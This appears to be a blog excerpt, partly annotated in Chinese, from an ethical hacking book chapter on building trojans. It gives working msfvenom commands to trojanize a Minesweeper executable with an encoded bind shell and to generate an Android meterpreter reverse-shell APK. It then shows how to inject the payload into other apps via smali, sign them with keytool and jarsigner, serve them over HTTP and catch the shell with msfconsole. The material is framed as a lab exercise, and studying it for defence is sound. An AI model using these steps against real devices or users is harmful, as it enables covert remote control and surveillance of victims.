Ethical.Hacking.2021.10：BUILDING TROJANS（2）

Creating a Windows Trojan

We’ll cover two methods of hiding your implant: in a fun, open source implementation of the game Minesweeper by Humaeed Ahmed, and in a document using the Social Engineering Toolkit (more on this in a moment).

Hiding the Trojan in Minesweeper

I’ve forked Ahmed’s repository, and you can download a copy of the executable from
the following link: https://github.com/The-Ethical-HackingBook/Minesweeper/blob/master/Minesweeper/bin/Debug/Minesweeper.exe. Save it to
your Malware folder on your Kali desktop.

After you’ve downloaded the executable, use msfvenom to transform it into a
malicious trojan by running the following command:

msfvenom -a x86 --platform windows -x program.
exe -k -p windows/shell/bind_tcp -e x86/shikata_ga_nai lhost=<Kali IP
address>-f exe -o evilProgram.exe

Hiding the Trojan in a Word Document (or Another Innocent File)

The Social Engineering Toolkit (SET) abstracts the
Metasploit Framework’s details and makes it easy to send and generate this kind of
infected media. Run the following command to start SET:

kali@kali:~$ sudo setoolkit

---

Creating an Android Trojan

 generate a new malicious APK that contains a reverse shell implant:

msfvenom -p android/meterpreter/reverse_tcp
LHOST= <Kali IP address> LPORT=443 > malicious.apk

Deconstructing the APK to View the Implant

We’ll use apktool, a reverse engineering tool, to decompile the APK. Run the
following command to download and install apktool:

sudo apt-get install apktool

kali@kali:~/Desktop/AndroidTrojan$ apktool d malicious.apk

Similarly, you can create your own trojan by decompiling an existing APK, copying
the Metasploit folder to the smali folder, and then adding the preceding snippet to
MainActivity.smali to start the payload.

Rebuilding and Signing the APK

apktool build ~/Desktop/AndroidTrojan/malicious -o malicious2.apk

All Android apps must be signed before they can be run on an Android device. You
can do this with the Java Keystore, which stores and protects key material such as the
public and private keys used for signing. Key material never leaves the Keystore.
Instead, an application sends the Keystore its data, and the Keystore uses the
protected key material to sign or encrypt data and returns the results, as illustrated in
Figure 10-10. Some systems even store key material in a separate piece of secure
hardware called a trusted execution environment.

 Run the following command to install the Java Development Kit (JDK), which
contains the tools we’ll use to sign the trojan APK:

sudo apt install -y default-jdk

Generate the RSA key we’ll use to sign the trojan by using this command:

keytool -genkey -keystore my-malicious.keystore -alias alias_name_malicious -keyalg RSA -keysize 3072 -validity 10000

Now use Java’s jarsigner utility to sign the APK file:

jarsigner -sigalg SHA2withRSA -digestalg
SHA2 -keystore my-malicious.keystore malicious2.apk
alias_name_malicious

Testing the Android Trojan

Follow the instructions at
https://developer.android.com/studio/install/ to download Android Studio on your host
system, outside of your current virtual lab environment

把kali和新建的Android虚拟机放到同一个局域网内

 start a web server in the folder containing your signed malicious APK:

sudo python3 -m http.server 80

Now start the attacker server in a new terminal:（开启msf的服务器端监听）

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD
android/meterpreter/reverse_tcp; set LHOST <Kali IP address>; set
LPORT 8443; run; exit -y"

在android虚拟机中下载安装malicious2.apk

Try typing geolocate to get the phone
location. (Remember, the phone is running in a virtual machine and doesn’t have
access to GPS, so this location will be simulated.) Also run the help command to see all
of your options. Meterpreter isn’t perfect, so some options might not work: